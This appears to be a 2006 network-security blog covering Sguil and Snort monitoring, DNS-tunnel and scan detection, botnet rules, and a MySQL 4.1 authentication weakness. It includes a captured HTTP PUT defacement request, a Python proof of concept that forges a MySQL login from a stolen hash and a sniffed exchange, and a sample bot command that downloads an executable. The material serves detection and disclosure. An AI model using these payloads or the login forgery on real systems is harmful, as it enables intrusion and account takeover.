    $entity = $parser->parse(\*STDIN); \
    $entity->dump_skeleton;' < *25


    Content-type: multipart/mixed
    Effective-type: multipart/mixed
    Body-file: NONE
    Subject: Message could not be delivered
    Num-parts: 2
    --
    Content-type: text/plain
    Effective-type: text/plain
    Body-file: /var/tmp/msg-1150990039-2841-0/msg-2841-1.txt
    --
    Content-type: application/octet-stream
    Effective-type: application/octet-stream
    Body-file: /var/tmp/msg-1150990039-2841-0/letter.zip
    Recommended-filename: letter.zip
    --

    As you can see, this command creates a directory /var/tmp/msg-XXXXXXX-XXXX-0/ which contains files for each piece of the MIME multipart message, including the attachment (in this case, /var/tmp/msg-1150990039-2841-0/letter.zip).


Now that you've got the attachment, you can use your favorite reverse engineering tools on it to figure out exactly what you've got on your hands.
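If you find yourself doing this very often, steps 3 and 4 are easy to roll into a single script. Here's a sketch (feed it the client-side *.00025 file on stdin):

#!/usr/bin/perl
# Strip the SMTP protocol chatter from a client-side tcpflow file and hand
# the message straight to MIME::Parser. A quick sketch of steps 3 and 4 above.

use strict;
use warnings;
use MIME::Parser;

# Keep only the message itself: everything from the first "Received:" line on.
my @message;
my $in_message = 0;
while (my $line = <STDIN>) {
    $in_message = 1 if !$in_message && $line =~ /^Received:/;
    push @message, $line if $in_message;
}

my $parser = MIME::Parser->new;
$parser->output_under("/var/tmp");
my $entity = $parser->parse_data(\@message);
$entity->dump_skeleton;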

Monday, June 19, 2006

Laptop encryption? I have a better idea.

I just read an AP article from last week, entitled Encryption can save data in laptop lapses. We hear about this problem in the news all the time now: someone loses a laptop with personally identifiable information about thousands of {customers|taxpayers|veterans|others}.

This is a real problem, make no mistake, but articles like this one are starting to piss me off. Instead of talking about encryption, let me propose a much more revolutionary idea: don't put the freakin' data on the laptop in the first place!

Laptops are designed to be mobile, and are easily lost, stolen or broken. Good encryption practices are rare (hint: it's not just a matter of software, but also of implementation, policy and user acceptance). Instead of worrying about whose laptop is going to be stolen next, let's try to address the real issue: does that data really need to be stored on the laptop in the first place?

If mobile users need access to data in the field, make them VPN back to the corporate network and work on it there. And don't tell me things like, "But we need to work on the plane" because you don't. You may want to work at 26,000 feet (it's better than watching Firewall on the tiny screen), but my privacy rights outweigh your productivity crisis anytime.

Let me end this rant by saying that if your company insists on placing your customers' personal information on laptops or other mobile devices, encrypted or not, I hope they hammer you in court.

Update 2006-06-09: Finally, some mainstream coverage for this apparently radical idea! In a story entitled Why Do Laptops Schlep Such Data?, the unnamed AP author raises the question about whether carrying such data around on mobile devices is appropriate. Short answer: "No, but some people will inevitably find a way to do it anyway." No doubt this is true, and that's why routine encryption of mobile data remains important. Just don't be confused about the proper use of mobile encryption: It's not the first line of defense, it's the last. It ideally only comes into play once someone has violated corporate policy by copying data onto the device.

Unfortunately, the article does miss (badly!) on an important point. The second-to-last paragraph describes software that "shreds" data on the hard drive if the laptop is stolen. The idea behind this type of so-called protection is absurd. The laptop's OS and security software have to be running in order for this to be effective, but any competent computer thief can swap out a hard drive and copy the data with only a few moments' work.

Thursday, June 15, 2006

Tracking your most active network protocols with Sguil

All you Sguil users out there might find this interesting. I wanted to figure out a way to track the top most active protocols flowing over my perimeter, where "active" in this case means "most bytes transferred either in or out of my network". This is actually a fairly simple database query, but I had a special requirement.

You see, I wanted to know not only the total number of bytes transferred, but I wanted to see it broken down by whether the traffic was entering my network or leaving my network. SANCP (Sguil's session collector) tracks bytes by source and destination, but that's not good enough. The source of one connection could be an Internet host, while the source of another connection could be a system on my own LAN. Just because SANCP records how many bytes the source host sent doesn't mean it knows whether they were entering or leaving my LAN.

Here's a SQL query that really can tell the difference:


select dst_port,
       sum(to_mynet) as bytes_to_mynet,
       sum(from_mynet) as bytes_from_mynet,
       sum(to_mynet + from_mynet) as total_bytes
from
(
    select dst_port,
           src_bytes as from_mynet,
           dst_bytes as to_mynet
    from sancp
    where (start_time between DATE_SUB(CURDATE(), INTERVAL 1 HOUR)
                          and CURDATE())
      and (src_ip between INET_ATON("192.168.0.0")
                      and INET_ATON("192.168.255.255"))
      and not (dst_ip between INET_ATON("192.168.0.0")
                          and INET_ATON("192.168.255.255"))
    UNION ALL
    select dst_port,
           dst_bytes as from_mynet,
           src_bytes as to_mynet
    from sancp
    where (start_time between DATE_SUB(CURDATE(), INTERVAL 1 HOUR)
                          and CURDATE())
      and not (src_ip between INET_ATON("192.168.0.0")
                          and INET_ATON("192.168.255.255"))
      and (dst_ip between INET_ATON("192.168.0.0")
                      and INET_ATON("192.168.255.255"))
) as test_table
group by dst_port
order by total_bytes desc
limit 5;


The trick here is to do two queries, each limiting itself to either sources on the Internet or sources on my LAN. I can then use the "SELECT" statements to order the columns to reflect the direction of the data flow. In this query, the second column (bytes_to_mynet) will always be the number of bytes coming into my network, and the third column (bytes_from_mynet) will always be the number of bytes flowing out. Of course, the first column is the destination port number, which corresponds roughly to the network protocol used.

These two queries are joined by a "UNION ALL" statement to make them into one large result set. The SQL code above treats this as a temporary table, from which the outer SELECT statement grabs its data and does the final work of summing both incoming and outgoing data flows and creating a neat table.

The output of this query will look something like the following table. Note that I ran it against some very odd sample data, so it doesn't show a full set of rows. Also, I messed with the numbers because I was uneasy about posting my real data here. Still, you can see what the report looks like.

+----------+----------------+------------------+-------------+
| dst_port | bytes_to_mynet | bytes_from_mynet | total_bytes |
+----------+----------------+------------------+-------------+
|       80 |           1816 |      51101804400 | 51101806216 |
|       22 |           1816 |      51101412328 | 51101414144 |
|      443 |           1816 |      51096413496 | 51096415312 |
|       53 |        1804400 |         18093887 |    18274327 |
+----------+----------------+------------------+-------------+


To use this in your own network, simply change the IP addresses above to represent the beginning and ending of your own address space. As written, the query covers only a single hour of data (the hour ending at midnight this morning), but you can play with the time specification to get other reporting periods.

Thursday, June 01, 2006

HTTP PUT Defacement Attempts

I've seen the number of website defacement attempts on my network rise by about 3 orders of magnitude since yesterday, as evidenced by this report:


mysql> select date(timestamp) as dt, count(*) from event
       where timestamp > "2006-05-30"
         and signature = "HTTP PUT Defacement Attempt"
       group by dt order by dt ASC;
+------------+----------+
| dt         | count(*) |
+------------+----------+
| 2006-05-30 |        3 |
| 2006-05-31 |     2006 |
| 2006-06-01 |     1301 |
+------------+----------+
3 rows in set (0.55 sec)

The count for 2006-05-30 is pretty typical (an average day sees less than 10 defacement attempts). Other analysts I've talked with don't seem to be noticing anything unusual. Is it just me?

The reason no one else is seeing them, it turns out, is that I forgot to contribute the Snort rule I wrote to detect these attacks. So here it is, in case you're interested in tracking these yourself:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"HTTP PUT Defacement Attempt";
flow:to_server,established; content:"PUT "; depth:4;
classtype:web-application-attack; sid:1000003; rev:1;)


The attack itself is quite simple. The attackers simply use a built-in HTTP method designed to allow an authorized user to upload a file directly into the web space. It's not even really an exploit, since they're using the PUT method the way it was designed to be used. They're just counting on a misconfiguration that allows anyone to do it.

Here's an example:

PUT /index.html HTTP/1.0
Accept-Language: en-us;q=0.5
Translate: f
Content-Length:153
User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1.1
Host: education.jlab.org

spykids spykids spykids spykids spykids spykids spykids
spykids spykids spykids spykids spykids spykids spykids
spykids spykids spykids spykids spykid\n\n


As you can see, they're trying to replace the site's default page ("/index.html") with a page consisting entirely of their own text ("spykids" repeated several times).

There seems to be a constant low level of these attacks on the Internet, and if your servers are configured correctly, you have nothing to worry about. Still, if you're like me, you'll want to track these defacement attempts anyway. Using my rule, now you can. I'll be submitting it to the Sourcefire Community Ruleset, so hopefully it'll show up there soon.
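If you want a quick way to check whether one of your own servers will accept an anonymous PUT, a few lines of LWP will do it. This is just a sketch, and the URL is a placeholder; obviously, only point it at servers you're responsible for.

#!/usr/bin/perl
# Quick check for anonymous HTTP PUT. A sketch, not a pen-test tool;
# only point it at servers you're responsible for.

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

my $url = shift @ARGV or die "usage: $0 http://www.example.com/puttest.html\n";

my $ua  = LWP::UserAgent->new(timeout => 10);
my $req = HTTP::Request->new(PUT => $url);
$req->content("puttest\n");

my $res = $ua->request($req);
print $res->status_line, "\n";

# A 2xx response means the server accepted the upload, so go fix the config.
# A correctly locked-down server should answer with 403 or 405.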

Update 2006-06-01 14:37: I'm not the only one who has noticed this anymore. Apparently this group has been defacing a lot of sites lately. Fortunately, I didn't notice it in quite the way this guy did. I guess they've decided to crank up the defacement machine recently.

Tuesday, May 30, 2006

InfoSeCon 2006 Report

Earlier this month, I was very fortunate to be an invited speaker at InfoSeCon 2006. This was my second year speaking there, and there are two things you should know about this conference:


  1. It's a small conference by design: the organizers have created an atmosphere where the speakers and attendees mingle freely, discuss issues over dinner and drinks, and actually talk rather than just attend presentations. They've built a community, and this works extraordinarily well for both speakers and attendees.
  2. The location is spectacular. Dubrovnik is a UNESCO World Heritage Site for a reason, and it's no joke when they call it the "Pearl of the Adriatic." In fact, the location is so spectacular that the biggest danger is that your boss will want to go instead. Fight this, or you'll miss the spectacular evening events that make this very much resemble a working vacation.

The conference was a mixture of combined sessions and individual "Management" and "Technical" tracks. The speaker list was headed this year by two big names in the industry: Eugene Kaspersky (of Anti-Virus fame) and Marcus Ranum (of "I invented the firewall and we've pretty much all screwed it up since" fame). Mr. Kaspersky's talks were a little light on the technical content, I thought, having been written by his marketing department. Still, it was interesting to hear him speak about the relationship between malware and organized crime. Nothing that isn't already common knowledge, but he's on the cutting edge of this fight, so just hearing his thoughts was instructive. He also spoke about the organization of his company's malware lab, but I was fairly disappointed with this, as it lacked substantive detail and mostly just emphasized the fact that they do have such a lab.

Marcus Ranum's talks were much more interesting. In fact, he was something of a lightning rod of controversy, as I understand him to be elsewhere, too. He gave a pair of talks, about the state of the security industry and about the evolution of the firewall. The overarching theme, which became a sort of conference catchphrase, was that "we're doing security wrong." Not that anyone has a comprehensive solution yet, but if the first step is admitting that we have a problem, then I think he's done his job. I don't always agree with Marcus, but after hearing him speak and spending some time with him informally, I think his points are valid.

By the way, remember when I said that the organizers try hard to create opportunities to mingle with the speakers? It works. I really appreciated the opportunity to sit down and have several conversations with Marcus. I also got to spend rather a lot of time with some friends, both new and old, in the Croatian, Slovenian and Slovakian IT industry. We prowled the medieval streets of Cavtat looking for vampire photos and listened to a restaurant full of boisterous Croatian tourists singing along with an accordion. We sailed the Adriatic and scaled the Dubrovnik city walls. We even learned a few things about the discipline of Information Security. All in all, a valuable and enjoyable trip, and I can't wait for InfoSeCon 2007!

Friday, May 19, 2006

Scan detection via network session records

I needed a quick, easy way to detect scanners on my LAN. Since I'm running Sguil, I have plenty of data about network sessions in a convenient MySQL database. I thought, why not use that?

My premise (cribbed from Snort's sfPortscan preprocessor) is that network scanning activity stands out due to its unusually high number of failed connection attempts. In other words, most of the time the services being probed are not available, and this makes the scanner easier to spot. Here is a simple perl script I wrote that implements this type of scan detection by querying Sguil's SANCP session database.

To use it, you'll need to edit the script to modify the $HOME_NET variable. It's a snippet of SQL code, but it's very simple and documented in the comments. I'm looking for scanning activity on my own LAN, so the default is to set it to search only for activity with two local endpoints. If you are reasonably fluent in SQL, though, you can customize this to find other types of scans. There are a few other variables you can tweak (read the comments) but nothing terribly critical.

The script identifies two types of scanning activity. Portsweepers are systems that try a few different ports across a variety of addresses. For example, malware that looks around trying to find open web servers would fall into this category. On the other hand, portscanners are systems that try a lot of ports, usually on a relatively few systems. Attackers that are trying to enumerate services on a subnet would be a good example.

I haven't really tested this anywhere but a RHEL/CentOS 4 system. If you get it working on some other platform, or if you have any other comments/suggestions/improvements, please post them here.
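If you just want the flavor of the portscanner check without downloading anything, by the way, its heart boils down to a single query against the sancp table. Here's a stripped-down sketch: the DSN, credentials, HOME_NET range and threshold are all placeholders, and I'm treating sessions where the destination sent nothing back as a rough stand-in for a failed connection attempt.

#!/usr/bin/perl
# Stripped-down portscanner check against Sguil's SANCP table: flag internal
# hosts that touched a suspiciously large number of distinct ports in the last
# hour without getting any data back. The DSN, credentials, address range and
# threshold below are placeholders; adjust for your own site.

use strict;
use warnings;
use DBI;

my $threshold = 100;    # distinct destination ports per source, per hour

my $dbh = DBI->connect("DBI:mysql:database=sguildb;host=localhost",
                       "sguil", "password", { RaiseError => 1 });

my $sql = qq{
    select INET_NTOA(src_ip) as src, count(distinct dst_port) as ports
    from sancp
    where start_time > DATE_SUB(NOW(), INTERVAL 1 HOUR)
      and dst_bytes = 0
      and (src_ip between INET_ATON('192.168.0.0')
                      and INET_ATON('192.168.255.255'))
    group by src_ip
    having ports >= $threshold
    order by ports desc
};

my $sth = $dbh->prepare($sql);
$sth->execute();

while (my ($src, $ports) = $sth->fetchrow_array) {
    print "$src hit $ports distinct ports with no response in the last hour\n";
}

$dbh->disconnect;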

Thursday, May 18, 2006

The value of privacy

In his latest editorial, The Eternal Value of Privacy, Bruce Schneier provides a compelling answer to the question, "If you aren't doing anything wrong, what do you have to hide?"

Schneier's argument is slanted more towards the national security issues of domestic wiretaps, video surveillance and the like, but his points are also valuable from a cybersecurity perspective.

Many of us are tasked with monitoring for abuses of and intrusions into our computing infrastructure. This means collecting and analyzing data, much of which may be considered personal or private. IDS analysts especially may come into contact with the contents of personal communications such as emails, instant messages or even VOIP calls. We may see web URLs, chat room logs or forum postings detailing medical conditions, alternate lifestyles, or even employment concerns. It is our duty (and in many cases, our legal obligation) to protect this information against disclosure, even to others within our own organizations, unless there is a clear security concern which must be acted upon. Even then, discretion and need-to-know are critical.

If you're reading my blog, you're in a group of people who are likely to tackle thorny privacy issues on a regular basis. I highly recommend taking the time to read Schneier's short editorial and think about how this applies to your own situation.

Wednesday, May 03, 2006

A traffic-analysis approach to detecting DNS tunnels

I had the chance to see a very interesting presentation last week about DNS tunnels. I understand the concepts well enough, but I had never run into one "in the wild." I realized, however, that I probably wouldn't have noticed one in the first place, so I decided to try to do a little digging to see if I could come up with a detection mechanism.

Fortunately, I'm using Sguil to collect all my Network Security Monitoring (NSM) data. As you may know, Sguil collects (at least) three types of data:


  1. Snort IDS alerts
  2. Network session data (from SANCP)
  3. Full content packet captures (from a 2nd instance of Snort)

The packet captures are not typically used for alerting purposes, leaving me with the possibility of using either an IDS signature based approach, or something using traffic analysis on the network sessions.

Some DNS tunnel detection signatures already exist (The Sourcefire community ruleset already has signatures to detect the NSTX tunnel software), but I think this approach is doomed to failure from the start. A signature-based approach would be good for detecting specific instances of DNS tunnelling software, but for real protection, a more general detection capability is required. I chose to try the traffic analysis approach instead.

I started with the assumption that there were basically three uses for DNS tunnels, to wit:

  1. Data exfiltration (sending data out of the LAN)
  2. Data infiltration (downloads to the local LAN)
  3. Two-way interactive traffic

Of course, the fourth possibility is that a tunnel could be used for some combination of the above, but I left that out of scope. I also ignored two-way interactive traffic for now, since it's harder and I'm just starting to look into this. My main goal was to identify data exfiltration by looking at "lopsided" transfers. By extension, the same technique could also be used to discover data infiltration, as I'll show.

Once I identified the types of tunnels I wanted to detect, I tried to deduce what their traffic profiles would look like. Specifically, I assumed the following:

  1. At least one side of the session would be associated with port 53.
  2. The tunnel could use either TCP or UDP (though UDP is the most likely), but since SANCP is able to construct pseudo-sessions from sessionless UDP traffic, I could effectively ignore the difference between TCP and UDP sessions.
  3. The upload/download ratio would be lopsided. That is, the tunnel client would either be sending more data than it receives (exfiltration) or vice versa (infiltration).

If you're not familiar with Sguil, just know that all the network session data is stored in a MySQL database. Although you normally access this data through the Sguil GUI, it's also easy to connect with the normal MySQL client application and send arbitrary SQL queries. I started with this one:

select start_time, end_time, INET_NTOA(src_ip), src_port,
       INET_NTOA(dst_ip), dst_port, ip_proto,
       (src_bytes / dst_bytes) as ratio
from sancp
where dst_port = 53
  and start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and CURDATE()
having ratio >= 2
order by ratio DESC LIMIT 25;

The intent of this query is to identify at most 25 DNS sessions during the last week where the initiator (the client) sends at least twice as much data as it receives in response. Sounds good, but it is actually a bit naive. It turns out that many small transactions fit this profile, especially if the DNS server doesn't respond (the response size is 0 bytes).

I fixed this problem by also looking for a minimum number of bytes transferred (in either direction). After all, the purpose of a DNS tunnel is to transfer data, so if there are only a few bytes, the odds are very, very good that it's not a tunnel. In this version, I've set up the query also to check that the total number of source and destination bytes is at least 50,000:

select start_time, end_time, INET_NTOA(src_ip), src_port,
       INET_NTOA(dst_ip), dst_port, ip_proto,
       (src_bytes + dst_bytes) as total,
       (src_bytes / dst_bytes) as ratio
from sancp
where dst_port = 53
  and start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and CURDATE()
having ratio >= 2 and total > 50000
order by total DESC, ratio DESC LIMIT 25;

This brings the number of false positives down quite a bit. If this still isn't good enough, you can tune both the ratio and the total bytes to get whatever level of sensitivity you're comfortable with. Increasing either number should decrease false positives, but at the expense of creating more false negatives (i.e., you might miss some tunnels).

By the way, I mentioned before that you could use the same approach to detect either exfiltration or infiltration. The queries above are written for exfiltration, so if you would like to look for infiltration, simply change the definition of the "ratio" parameter from this:

(src_bytes / dst_bytes) as ratio

to this:

(dst_bytes / src_bytes) as ratio

That'll look for data going in the other direction. The rest of the query is identical for either case.

As I mentioned, I've never encountered a DNS tunnel outside of a lab environment (yet), so I can't say how well my approach holds up in the real world. If anyone with more experience would like to comment, I'm all ears. Similarly, if anyone decides to try out my method, I'd love to hear how it works out for you.

Update 2006-05-04 14:33: My fellow #snort-gui hanger-on and all-around smart guy tranzorp has posted additional analysis of my ideas on his blog. Specifically, he points to two easy ways to evade this simple type of analysis, and I recommend that you read his post for yourself, because he's got a lot of experience with this topic.

If you just want a quick 'bang-it-out-in-an-emergency' check for tunnels, the following updated query isn't bad. It's the same as above, but corrects for the fact that the DNS reply contains a complete copy of the DNS query, as tranzorp pointed out:

select start_time, end_time, INET_NTOA(src_ip), src_port,
       INET_NTOA(dst_ip), dst_port, ip_proto,
       (src_bytes + (dst_bytes - src_bytes)) as total,
       (src_bytes / (dst_bytes - src_bytes)) as ratio
from sancp
where dst_port = 53
  and start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and CURDATE()
having ratio >= 2 and total > 50000
order by total DESC, ratio DESC LIMIT 25;


Based on feedback I've received from tranzorp and others, I'm looking at a more statistical approach to the problem. In short, I'm experimenting with computing a pseudo-bandwidth for each session (bytes sent / session duration), then looking for abnormally high or low bandwidth sessions. I've got a prototype, but it's written in Perl and is horribly inefficient for the mountain of DNS session data I collect. I'll post something about it once I've had a chance to tweak it some more.
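In the meantime, here's a rough Python sketch of the pseudo-bandwidth idea. This is not my Perl prototype; the field layout, toy numbers and three-sigma threshold are just placeholders for illustration.

# Rough sketch of the pseudo-bandwidth idea (not my actual prototype).
# Each session is a (src_bytes, dst_bytes, duration_seconds) tuple, e.g.
# pulled from the SANCP table with a query like the ones above.
from statistics import mean, stdev

def pseudo_bandwidth(src_bytes, dst_bytes, duration):
    """Bytes per second for a session; pad zero-length sessions to 1s."""
    return (src_bytes + dst_bytes) / max(duration, 1)

def flag_outliers(sessions, num_stdevs=3):
    """Return sessions whose pseudo-bandwidth is unusually high or low."""
    rates = [pseudo_bandwidth(*s) for s in sessions]
    avg, sd = mean(rates), stdev(rates)
    return [s for s, r in zip(sessions, rates)
            if abs(r - avg) > num_stdevs * sd]

if __name__ == "__main__":
    # Toy data: lots of normal-looking lookups plus one suspiciously fat "DNS" session.
    sessions = [(80, 200, 1)] * 50 + [(900000, 1200000, 60)]
    for s in flag_outliers(sessions):
        print("suspicious DNS session:", s)

In practice you'd feed it session records pulled straight from the SANCP table rather than toy tuples, but the shape of the idea is the same.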

Tuesday, May 02, 2006

Unintentionally acknowledging the truth

Here's a funny typo in a recent article about Verizon upgrading the bandwidth on it's fiber-to-the-home service:

The 30-Mbit premium tier was left untouched, in bot performance and price.

Too true, I'm afraid. Too true.

Sunday, April 30, 2006

New HRSUG Website Launched

I'm pleased to announce the grand opening of the new HRSUG website at hrsug.org. The site will carry the latest information about HRSUG meetings and happenings, and separates the information from my personal blog (this one).

I also hope to publish network security-related notes or articles contributed by HRSUG members. If you want blog posting privileges, let me know and I can add you to the list.

Let's keep this announcement short and sweet. Remember, HRSUG is for the members, so let me know if you have ideas for improving the site.

If you read this far, it may also interest you to know that the May HRSUG meeting is coming up this week.

Wednesday, April 19, 2006

EIDE/SATA USB adapter cable, good for forensics?

This product looks like it could really be nice for acquiring images of suspect hard drives.

One interesting feature is that you can connect both the EIDE and the SATA drive at the same time. I guess it could be a bit slow trying to acquire an image when both the source and destination drives are on the same USB port, but on the other hand it's a lot more portable than a full tower rig, so things might balance out.

The obvious problem is the lack of an integrated write-blocker, but I guess you could use your own along with this device.

Anyone tried one yet?

Tuesday, April 04, 2006

April HRSUG Meeting Reminder

Hi, all. I just want to remind everyone that the April meeting of the Hampton Roads Snort Users Group (HRSUG) is coming up:


Date: Thursday, 6 April 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

The topic for the meeting will be "EZ Snort Rules", an introduction to writing basic IDS rules in everyone's favorite pig-themed IDS. See you there!

Update 04/06/06 22:30: I've posted the slides for my presentation on the Vorant downloads page. The full title of the talk is "EZ Snort Rules: Find the Truffles, Leave the Dirt".

Thursday, March 30, 2006

MySQL 4.1.x authentication internals

While reviewing the deployment plans for a new MySQL server yesterday, I started wondering about the security of the authentication protocol it uses. Most of the users of the new database would be accessing it via the LAN, without the benefit of SSL encryption. It's well known that the MySQL 3.x authentication protocol is vulnerable to sniffing attacks, so MySQL 4.1 introduced a new authentication scheme designed to be more secure even over a plaintext session. But was it good enough?

I first spent some time understanding exactly how the protocol works. Thanks to some kind folks in the #mysql channel on irc.freenode.net, I located the MySQL internals documentation page that describes the authentication protocol. Unfortunately, this page doesn't really describe what's going on in the 4.1 protocol, so I turned to the source code for the definitive scoop.

Just so no one else has to do this again, here's a better description of how the protocol works, based on the 5.0.19 release. Look in libmysql/password.c at the scramble() and check_scramble() functions if you want to check the source code for yourself.

The first thing to know is that the MySQL server stores password information in the "Password" field of the "mysql.user" table. This isn't actually the plaintext password; it's a SHA1 hash of a SHA1 hash of the password, like this: SHA1(SHA1(password)).

When a client tries to connect, the server will first generate a random string (the "seed" or "salt", depending on which document you're reading) and send it to the client. More on this later.

Now the client must ask for the user's password and use it to compute two hashes. The first hash is a simple hash of the user's password: SHA1(password). This is referred to in the code as the "stage1_hash". The client re-hashes stage1 to obtain the "stage2_hash": SHA1(stage1_hash). Note that the stage2 hash is the same as the hash the server stored in the database.

Next, the client hashes the combination of the seed and the stage2 hash like so: SHA1(seed + stage2_hash). This temporary result is then XORed with the stage1 hash and transmitted to the server.

Now the server has all the information it needs to decide whether the user supplied the correct password. Remember that the server stores the stage2_hash in the database, and it originally created the seed, so it knows both of those. What it wants to recover is the stage1_hash. Fortunately, the data transmitted by the client is just SHA1(seed + stage2_hash) XORed with the stage1 hash. To recover the stage1 hash, the server recomputes SHA1(seed + stage2_hash) and XORs it with the data provided by the client; the result is the stage1 hash. Since the stage2_hash is simply SHA1(stage1_hash), the server can then compute a new stage2_hash and compare it to the hash in the database. If the two match, the user provided the proper password.
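If that description is hard to follow, here's the whole exchange as a short Python sketch. This is my own illustration of the scheme described above, not the code from libmysql/password.c, and the 20-byte seed length is just a convenient choice for the demo.

# My own illustration of the 4.1 exchange described above, not MySQL's code.
import hashlib
import os

def sha1(data):
    return hashlib.sha1(data).digest()

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# What the server stores in mysql.user.Password: SHA1(SHA1(password))
password = b"s3kr1t"
stage2_hash = sha1(sha1(password))

# Login begins: the server sends the client a random seed
seed = os.urandom(20)

# Client side (scramble): hash the password twice, then mask stage1
stage1_hash = sha1(password)
client_reply = xor(sha1(seed + sha1(stage1_hash)), stage1_hash)

# Server side (check_scramble): recover stage1, re-hash it, compare
recovered_stage1 = xor(sha1(seed + stage2_hash), client_reply)
assert sha1(recovered_stage1) == stage2_hash
print("login accepted")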

Ok, I admit that was probably a little confusing, but here's where I think it gets really interesting. There is a flaw in this protocol. The security depends on keeping two pieces of information a secret from attackers: the stage1 and stage2 hashes. If the attacker knows both hashes, they can construct a login request that will be accepted by the server.

Stage2 hashes are protected by keeping the database files away from prying eyes, but if an attacker were to steal the database backup tapes, for example, the hashes for all database accounts would be in his possession.

Still, just having the stage2 hashes is not enough. The final piece of the client's authentication credential is XORed with the stage1 hash, and since the server doesn't know the stage1 hash, the protocol has to give it everything it needs to derive that hash itself. Unfortunately, that means the same information can be derived by anyone who can sniff a valid authentication transaction off the wire and who also possesses a copy of the stage2 hash.

So the weakness is that if an attacker has the stage2_hash stored in the db, and can observe a single successful authentication transaction, they can recover the stage1_hash for that account. Using both hashes, they can then create their own successful login request, even without knowing the user's actual password.
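To make that concrete, here's the attack spelled out as another small, self-contained Python sketch. Again, this is purely my own illustration; the password, hashes and seeds are made up for the demo.

# Attack sketch: the attacker holds the stage2 hash (say, from a stolen
# backup of the mysql.user table) and has sniffed one successful login.
import hashlib
import os

def sha1(data):
    return hashlib.sha1(data).digest()

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Recreate the values the attacker stole or observed.
password = b"s3kr1t"                                          # unknown to the attacker
stage2_hash = sha1(sha1(password))                            # stolen from the database
seed = os.urandom(20)                                         # sniffed off the wire
client_reply = xor(sha1(seed + stage2_hash), sha1(password))  # sniffed too

# Step 1: recover the victim's stage1 hash from the sniffed exchange.
stolen_stage1 = xor(sha1(seed + stage2_hash), client_reply)

# Step 2: answer a brand-new challenge without ever knowing the password.
new_seed = os.urandom(20)                                     # sent by the server next time
forged_reply = xor(sha1(new_seed + stage2_hash), stolen_stage1)

# The server's check (recover stage1, re-hash, compare) succeeds.
assert sha1(xor(sha1(new_seed + stage2_hash), forged_reply)) == stage2_hash
print("forged login accepted")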

I've confirmed this with the MySQL team, who say that this is a known issue. It is difficult to exploit, I think, since you need a fair amount of information in order to make the attack successful. Frankly, if you already have the password hashes, you probably also already have the rest of the info in the database as well, so this might be overkill. Still, I had fun working through this last night, so I thought others might enjoy it as well. At the least, maybe I'll save someone else the time I spent understanding how the protocol works.

If this vulnerability really concerns you, you can protect the stage1 hash information by using MySQL's built-in SSL session encryption support. You should probably also be encrypting your backup tapes to protect the stage2 hash and all the data.

Friday, March 17, 2006

Detecting common botnets with Snort

I've been reading up on the mechanics of how popular bot software actually works, with an eye towards detecting it on the wire. I've been using the BLEEDING-EDGE ATTACK RESPONSE IRC - Nick change on non-std port rule and its cousins, which attempt to detect botnets and other "covert" channels that think they're clever by sending IRC protocol traffic over ports not normally associated with IRC. These rules work well, but they have two problems:


  1. Some IM programs (like ICQ and MSN Messenger) use the IRC protocol on various ports and thus trigger this rule
  2. The rules don't detect botnet traffic if the bots happen to use the standard IRC port (6667)

One of the papers I've been reading recently was this great overview of four popular bot packages, An Inside Look at Botnets by Paul Barford and Vinod Yegneswaran. This isn't groundbreaking new research by any means, but they have started to put together some basic practical information about how these things work on the wire.

Having read that paper, I decided it would be fun to write a set of Snort rules to detect traffic generated by the four bots they mention. That would at least address part of problem #2, so it could be a very worthwhile effort as well. Here are the rules, suitable for inclusion in your own local.rules file.

For those who are curious about what these do, there are three functions. The first rule (sid 9000075) attempts to define IRC protocol traffic, no matter what port the server is using. It sets the "is_proto_irc" flowbit on the session, so the later rules can depend on this to be set and won't do a lot of work inspecting non-IRC packets. This rule will never generate any alerts; it's only there to make the other rules in this file more efficient.

The second rule (sid 9000076) isn't necessarily related directly to botnets. It looks for IRC servers that seem to be on your local network and are communicating with outside hosts. If you actually do run a legitimate server, modify or comment this out as appropriate.

All the rest of the rules look for specific commands used by AgoBot/PhatBot, SDBot, SpyBot and GTBot. The GTBot commands are slightly more complex. All the others just use plain words (like "portscan ") for commands, but GTBot uses a command character to distinguish commands from other data (like "!portscan "). Since it seemed to me that the command character was likely to change from botherder to botherder, I coded in a regular expression that tried to allow a variety of possible cmdchars. You'll see those in the rules.
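If you're curious what that looks like in practice, here's a quick Python approximation of the idea; the character class and command list below are illustrative, not the exact PCRE from my rules.

# Rough Python approximation of the GTBot command-character idea.
# The character class and command names are illustrative only.
import re

GTBOT_CMD = re.compile(r'^[!.@#$%^&*~-](portscan|scan|packet|update)\b', re.IGNORECASE)

for line in ["!portscan 192.168.1.0/24", ".update http://bad.example/bot.exe", "just chatting"]:
    if GTBOT_CMD.search(line):
        print("possible GTBot command:", line)

In the actual rules, of course, this ends up as a pcre option rather than standalone code.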

Anyway, feel free to use these rules if you like. I won't guarantee they work well yet, since I haven't been running them long, but so far so good. They probably won't crash your snort process, but that's about all I can say about them. I will give you one note of caution: If you find an active botnet, you may generate a lot of alerts. Consider using thresholding to avoid overwhelming your IDS analyst.

If you actually detect a botnet through these rules, please let me know. As far as I know, I have no active botnets right now, so I've only been able to test them against contrived traffic and not live data. I'd like to know if they do or do not work in the wild.

Update 4/4/2006: These bot rules are now included as part of the snort.org community ruleset. Thanks to Sourcefire's Alex Kirk, who made the rules better by pointing out that I forgot to add the "nocase" directive to make the rules case-insensitive. If you're using my rules, I recommend that you remove them and have a look at the community rules instead.

Tuesday, February 28, 2006

I'm finally caving in...

...and sitting the CISSP exam. I mentioned this to a few people today and got one of two reactions:


  1. They immediately lost all respect for me, or
  2. Ok, I lied. There was only one reaction.

I admit this was based on a rather limited sample, but wow. People really seem to hate the CISSP, all it stands for, its dog and the horse it rode in on.

I've read some of Richard Bejtlich's thoughts on the matter (which made quite the splash when they were originally published). I agree with him that the ISC(2) code of ethics is pretty much all the CISSP has going for it, but I don't think that explains the vitriol I see whenever the CISSP is mentioned. Nor do I necessarily think it's jealousy, because most of the people I get this from could easily pass the exam (if they were willing to pony up the $500 fee).

